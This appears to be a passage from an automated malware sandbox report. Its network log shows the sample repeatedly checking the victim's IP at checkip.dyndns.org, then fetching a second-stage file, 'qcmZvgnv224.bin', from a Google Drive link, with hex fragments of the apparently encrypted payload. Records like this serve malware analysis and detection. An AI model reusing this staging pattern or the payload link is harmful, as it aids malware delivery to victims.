                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                39192.168.2.650067158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:40.286942959 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:40.892987967 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:40 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 79a55c9505846651bfc2c76e189f62b3
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                40192.168.2.650069158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:41.806492090 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:42.411880016 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:42 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: a0182b66b3f76123f13728647749b3ec
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                41192.168.2.650071158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:43.504038095 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:44.100224018 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:44 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 2786cd700588404c23e126a5ea632ca3
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                42192.168.2.650073158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:45.324461937 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:45.892574072 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:45 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 5593f0e0cd08fecfe9e367187def10ea
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                43192.168.2.650075158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:46.870397091 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:47.434124947 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:47 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 996558484b3e21c170db33e3f0e96bfc
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                44192.168.2.650077158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:48.366087914 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:48.977690935 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:48 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 0293b01bb313502bd593252f0412ffb4
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                45192.168.2.650079158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:50.055474043 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:50.655878067 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:50 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: f3608af534bb9f8753a9ada2d288480b
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                46192.168.2.650081158.101.44.242806424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:51.666868925 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:52.233449936 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:52 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: 4e1aa07275a4dfecd0e40b408ad5dac7
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                47192.168.2.650083158.101.44.24280
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Jan 10, 2025 22:44:56.217771053 CET151OUTGET / HTTP/1.1
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                Host: checkip.dyndns.org
                                                                                                                Connection: Keep-Alive
                                                                                                                Jan 10, 2025 22:44:56.801354885 CET321INHTTP/1.1 200 OK
                                                                                                                Date: Fri, 10 Jan 2025 21:44:56 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 104
                                                                                                                Connection: keep-alive
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                X-Request-ID: b6b6c235b1a8e023e036897de26f7209
                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.2.649869142.250.186.1424436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:23 UTC216OUTGET /uc?export=download&id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                Host: drive.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                2025-01-10 21:43:24 UTC1920INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Fri, 10 Jan 2025 21:43:23 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'nonce-RZM_CgbVyXVQt7WDsRo2vg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                1192.168.2.649875172.217.18.974436424C:\Users\user\Desktop\b5BQbAhwVD.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2025-01-10 21:43:24 UTC258OUTGET /download?id=1vC_QtzTi6v1ILf_ne_qID0ihwXnenveI&export=download HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                2025-01-10 21:43:27 UTC4938INHTTP/1.1 200 OK
                                                                                                                X-GUploader-UploadID: AFIdbgQ9QII2T7HBpMpiCHg8-cUojd7kEkqCocUuPkIUEj79x-SYKDfbfpmuoFUz03iOhkwbqtJ4vYg
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Security-Policy: sandbox
                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                                                                X-Content-Security-Policy: sandbox
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                                                                Cross-Origin-Resource-Policy: same-site
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Content-Disposition: attachment; filename="qcmZvgnv224.bin"
                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                Access-Control-Allow-Credentials: false
                                                                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 94272
                                                                                                                Last-Modified: Tue, 10 Dec 2024 07:03:25 GMT
                                                                                                                Date: Fri, 10 Jan 2025 21:43:27 GMT
                                                                                                                Expires: Fri, 10 Jan 2025 21:43:27 GMT
                                                                                                                Cache-Control: private, max-age=0
                                                                                                                X-Goog-Hash: crc32c=MXI2jQ==
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close
                                                                                                                2025-01-10 21:43:27 UTC4938INData Raw: 6d a2 6e 3d 51 e5 2f 67 2c a5 05 28 58 ac bd 8c 5f d1 29 4c c0 6d 28 21 2e 0d a2 38 4e 75 d0 28 f6 00 2d c1 8e 6f c0 77 d2 6a 42 43 c1 b5 c9 65 ee 84 6d ae 68 66 86 11 a5 d6 6c 73 94 57 77 ff aa aa e9 9b 16 56 8a c9 98 62 a1 30 af 27 91 e7 73 b9 a8 76 9e 0a 7a 7f ea ec d9 dc 46 5b d7 c0 8c f8 8b 73 35 67 7e f9 c6 e0 a3 84 89 7b 2e 61 f1 4a 62 6a ee 22 48 29 4b b6 c3 66 88 40 28 64 a2 f7 38 7d 5c 6b db c8 7b 8c 2f 12 35 f3 fd 9f d6 b8 45 90 6f e4 a4 c8 76 38 90 46 2b 77 d1 cd af 6b fe 20 dc 7f f1 ce cb 59 6d 9c 7d 3e b8 1b 34 86 a7 9f 5a 66 3b eb 71 c8 6b 22 f0 53 ef c9 d9 4d c5 73 11 3f 24 5c 62 a2 a9 b8 03 27 eb 7d a7 c3 c4 14 41 75 da da 07 b5 bf 40 d3 ca 05 08 3a 49 a2 ca 3f cd fd 0d dc ed 50 bf 85 5d 0a 16 54 a7 ad 25 c6 68 a3 cf 56 dc 11 f8 8c fe 3f
                                                                                                                Data Ascii: mn=Q/g,(X_)Lm(!.8Nu(-owjBCemhflsWwVb0'svzF[s5g~{.aJbj"H)Kf@(d8}\k{/5Eov8F+wk Ym}>4Zf;qk"SMs?$\b'}Au@:I?P]T%hV?
                                                                                                                2025-01-10 21:43:27 UTC4820INData Raw: fc ba de b7 7b 59 c2 ba 81 fb 07 03 a5 4a a7 fa 2d 0d de 7b be 62 cc ad fd 37 9f f6 b5 b4 66 e5 89 1f 71 c9 aa 20 b9 2e 30 eb 04 97 ef c1 95 2f b2 b9 58 fc ce 6c e4 1e 6a f2 42 3d c4 df b1 cd cb fc cc 28 88 a8 eb 54 7b 21 9a 44 2d 1c 8b 32 38 c3 7a 5e 7e d6 9b ff f3 9d 44 25 0e 34 43 3e 82 b9 f0 51 ad 55 9a a9 c5 58 a6 3f 2d 78 46 2b a0 85 03 ca 41 58 96 25 a8 6f a2 3c 90 11 7a cc 24 cf cd 2d 33 90 27 63 1b ff 86 c9 85 47 a3 88 a1 06 3a 19 f3 82 14 e2 5f 87 af be d2 74 8b 73 0d 47 85 b8 86 de 29 b8 98 f0 4e 2e 0d e9 d6 99 bc 8f ed 0c ee 04 22 fa da 58 48 8f b2 b3 d8 ef 20 d9 01 25 52 ab 8b 4e c2 dd 9b b1 95 8f d7 ef 94 d2 ba a6 8d 31 34 fb 6c 81 25 1f 79 4a 81 d4 47 10 23 ea b0 80 14 0b fd 88 0c fb 55 09 a5 48 65 37 d1 6a 26 93 e0 5b 5a a7 dd 55 9d f1 32
                                                                                                                Data Ascii: {YJ-{b7fq .0/XljB=(T{!D-28z^~D%4C>QUX?-xF+AX%o<z$-3'cG:_tsG)N."XH %RN14l%yJG#UHe7j&[ZU2
                                                                                                                2025-01-10 21:43:27 UTC1324INData Raw: a5 52 76 f0 b8 db 26 ec 17 68 fa 92 85 b2 8e d5 37 40 a8 c1 bc 2e 5f aa d0 c4 2b aa 3c ff bd c2 41 08 e0 39 38 a2 39 3f a5 b8 10 c3 c9 75 69 c5 cb a4 2f 89 ea d2 22 23 56 29 e1 a5 08 59 79 70 b3 5d c2 24 84 db 20 d5 99 5a b2 f0 81 6c f3 95 71 e8 7a a2 22 ca c5 db c4 06 dc 38 dc 21 c8 84 a1 a5 ab 08 bd 86 d9 f5 8b 2a f8 88 ed ce a9 4d 2e 77 37 10 14 19 fc 38 33 e2 bc e0 34 fc 63 2f e3 24 77 ff 72 30 1d 49 ae 99 82 05 b5 93 6c 62 78 86 54 87 d9 79 7c 97 31 d0 69 18 20 e3 67 8b ac ed 59 2c f9 9b ab 0e ce 52 bf 53 31 9b 2f d6 3b 16 64 29 e6 71 38 0f 32 33 29 0d 58 0c 0b 80 c6 08 35 7a ef 4e 1c 84 a4 bd de 33 eb 40 7a c2 b1 a5 21 7a 96 a5 17 09 c4 38 90 36 58 ed df 91 11 ac a7 57 b8 6a 0a 2f 73 c5 31 3e c3 01 8f 76 7c ba d9 5b 71 e1 c6 c3 13 1d 9b 42 02 1a 4c
                                                                                                                Data Ascii: Rv&h7@._+<A989?ui/"#V)Yyp]$ Zlqz"8!*M.w7834c/$wr0IlbxTy|1i gY,RS1/;d)q823)X5zN3@z!z86XWj/s1>v|[qBL
                                                                                                                2025-01-10 21:43:27 UTC1390INData Raw: 01 10 f1 99 ec ee 9a 1e c2 bc d3 f6 d1 2b 6b 22 ef f7 54 3a 1f f8 07 7a 5d 89 f6 7d 29 aa f6 52 1a cd f2 95 aa e7 22 85 96 a7 36 d7 9d 61 34 18 5e c8 c9 00 a0 f8 0d d2 91 99 00 7b c0 9b 00 e9 a8 65 ee 01 6d c7 d8 08 f7 22 8a ca 77 21 c0 a6 00 7f dd aa d2 8e ee 5f c7 c1 91 c8 21 0d 41 58 71 ff 20 1b 80 61 7a af f6 5d e2 37 b5 72 bf 24 8c ee bb 29 4c 27 52 11 fe 09 8c df 2c 7b 34 16 66 ae c4 94 71 28 fa 96 6b b4 b0 78 99 ea b8 7d 6b bb dd 4b 8b f3 da 03 fe 4d 73 ef 92 ff 6d e1 c2 45 a2 b8 d7 ce f7 30 b2 a2 c2 3f d1 07 5d 98 df 1b c4 f6 39 42 00 37 2e 38 d5 77 03 58 75 6d c6 ec c9 1c 57 ea d6 00 80 6c 3f eb a8 2b 86 79 74 b9 ff cd 33 fa 05 33 e5 91 28 c5 e6 81 1c b8 4a 71 f9 70 02 7c 94 bb 05 c0 78 85 4a 38 3c e0 a0 ce 7a a1 02 b1 37 f8 fd f1 d8 f5 8a 9c fa
                                                                                                                Data Ascii: +k"T:z]})R"6a4^{em"w!_!AXq az]7r$)L'R,{4fq(kx}kKMsmE0?]9B7.8wXumWl?+yt33(Jqp|xJ8<z7
                                                                                                                2025-01-10 21:43:27 UTC1390INData Raw: a0 d0 8b a1 df 39 bc 78 ec 8b 5f c4 a3 05 2b 86 8b c6 9f f5 3c ba a2 f4 b6 3b ea 68 83 2c 7c 2f 3f 14 a4 28 f1 32 ed d5 01 c2 64 18 88 72 d1 46 19 b0 35 80 63 cb 60 45 b3 d0 40 5a ad ca 36 10 eb 2b 4a dc 78 3c 87 d7 6c b1 e9 dc af 6c 47 02 c8 2a 8a fd fb 2f e1 cd 18 72 ba d1 5b c8 14 e2 e8 28 eb 6d 1a 04 d8 08 80 92 2a 2e bb 92 e6 2e c5 94 08 6c e7 28 a5 25 96 3c 34 dd a4 34 68 fc 1e 68 13 b7 e3 09 c5 f6 87 19 57 c2 9c 17 d9 e6 4e eb 0b fa db c0 08 e2 31 8f 12 4c e6 d6 b5 11 54 ee b9 d7 a3 6e 95 d9 c8 02 29 17 30 56 49 7e 81 3a 8a 9f 14 55 7d e7 62 f1 2c 24 47 83 ca 8d f8 47 28 7a 26 3e 95 e2 17 90 cc 31 6a 32 1f 95 af 8e 97 60 3e c5 88 7a b1 a1 10 d1 c2 7c 77 60 ab 43 6b 9a ed c9 39 c0 fa b9 fa 98 a7 81 c4 d5 3d 57 bb a5 5c 50 15 da c3 e0 38 c7 05 7d a7
                                                                                                                Data Ascii: 9x_+<;h,|/?(2drF5c`E@Z6+Jx<llG*/r[(m*..l(%<44hhWN1LTn)0VI~:U}b,$GG(z&>1j2`>z|w`Ck9=W\P8}
                                                                                                                2025-01-10 21:43:27 UTC1390INData Raw: 53 3a d4 b0 06 ca 53 21 30 25 ae 4f cd b2 8b 21 76 cc 27 c8 a2 a2 02 90 2d 0c 3a fd f4 05 f1 d7 d3 a0 e5 06 2b 15 d0 05 99 bb 55 f5 de b9 d5 2c 5b 45 0d 4d 95 29 ba d3 20 a1 b5 a6 4b 02 0e 92 57 9d bc bd 30 1d e8 76 26 8f 38 33 36 e2 ac c0 25 9d b2 d8 06 7d 80 ec 8b 44 e0 49 08 b1 9f 96 d1 80 80 bd 46 a2 fe af 27 f3 4d d1 33 06 10 5b 14 d4 4d 32 08 ed df 1c 07 02 e6 81 06 46 55 09 a0 28 f8 26 db 0f c8 9b 9e 4a 49 ac c8 2c 12 f6 23 35 00 61 2d 87 ab 80 a0 fb b9 49 03 b8 08 7f 33 f6 ec e9 38 31 f2 a4 ff e3 db 57 c9 07 f6 ef 33 91 9f f8 01 d2 6b 9e 95 36 11 1a 58 e7 2e de 8e eb 6c e7 23 af 39 93 22 d0 ec 74 34 69 93 e1 69 00 aa f2 c2 de 61 ff 1b a1 d3 50 13 17 6b 3c ee 0b ec db df 00 e8 33 9f de 57 72 a9 bd d0 44 be bb d7 a9 7f 81 d9 d4 87 20 1f e6 41 58 60
                                                                                                                Data Ascii: S:S!0%O!v'-:+U,[EM) KW0v&836%}DIF'M3[M2FU(&JI,#5a-I381W3k6X.l#9"t4iiaPk<3WrD AX`
